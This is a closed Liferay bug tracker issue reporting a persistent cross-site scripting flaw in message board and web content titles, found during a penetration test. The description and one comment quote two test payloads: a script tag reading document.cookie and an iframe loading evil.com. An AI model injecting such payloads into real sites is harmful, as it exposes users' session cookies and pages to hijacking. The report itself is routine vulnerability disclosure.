Persistent Cross-site Scripting (XSS) on Message Board

Details

Type: Bug
Status: Closed
Priority: Critical
Resolution: No Longer Reproducible
Affects Version/s: 6.1.1 CE GA2, 6.1.20 EE GA2
Fix Version/s: 6.2.0 CE M5
Component/s: Collaboration, Collaboration > Message Boards, Security > XSS
Labels:
None
Environment:
Tomcat unknow version

Similar Issues:
Show 3 results

Description

During a penetration testing of a Liferay portal, I have found a persistent XSS vulnerability.
With my user I was allowed to create message board with the title:
1 - "><script>alert(document.cookie)</script>
2 - "><iframe src="http://evil.com/"/>

This issue could affect every user who is going to see the message board.

Activity

Ascending order - Click to sort in descending order

Hide

Permalink

Grace Guan added a comment - 03/Mar/13 6:09 PM - edited

After contact with the reporter,let me add some details for this ticket.
1、Go to -> Control Panel -> Web content
2、Add web content set following values:Title: "><script>alert(document.cookie)</script> or Title: "><iframe src="http://evil.com/"/>
3、Save

Show

Grace Guan added a comment - 03/Mar/13 6:09 PM - edited After contact with the reporter,let me add some details for this ticket. 1、Go to -> Control Panel -> Web content 2、Add web content set following values:Title: "><script>alert(document.cookie)</script> or Title: "><iframe src="http://evil.com/"/> 3、Save

Hide

Permalink

Grace Guan added a comment - 04/Mar/13 2:10 AM

It's no longer a problem in liferay-portal/master, but it's still a problem in liferay-portal-ee/6.1.x.

Show

Grace Guan added a comment - 04/Mar/13 2:10 AM It's no longer a problem in liferay-portal/master, but it's still a problem in liferay-portal-ee/6.1.x.

Hide

Permalink

Samuel Kong added a comment - 04/Mar/13 7:02 PM

Cannot reproduce.
Will create new ticket for web content issue

Show

Samuel Kong added a comment - 04/Mar/13 7:02 PM Cannot reproduce. Will create new ticket for web content issue

Hide

Permalink

Ismael Gonçalves added a comment - 06/Mar/13 4:28 PM

Hello Guys,

As I understood the vulnerability is solved on versions 6.2.x.
Is this going to the "Known vulnerabilities" board?

Show

Ismael Gonçalves added a comment - 06/Mar/13 4:28 PM Hello Guys, As I understood the vulnerability is solved on versions 6.2.x. Is this going to the "Known vulnerabilities" board?

People

Assignee:

Samuel Kong

Reporter:

Ismael Gonçalves

Participants of an Issue:

Grace Guan, Ismael Gonçalves, Samuel Kong

Vote (0)

Watch (2)

Dates

Created:

28/Feb/13 4:14 PM

Updated:

06/Mar/13 4:28 PM

Resolved:

04/Mar/13 7:02 PM

Days since last comment:

11 weeks ago

Agile

View on Board

~~LPS-13031~~	Cross-Site Scripting (CXX) Vulnerability
~~LPS-3286~~	XSS vulnerability in <title> and <meta> tags
~~LPS-12628~~	XSS in message boards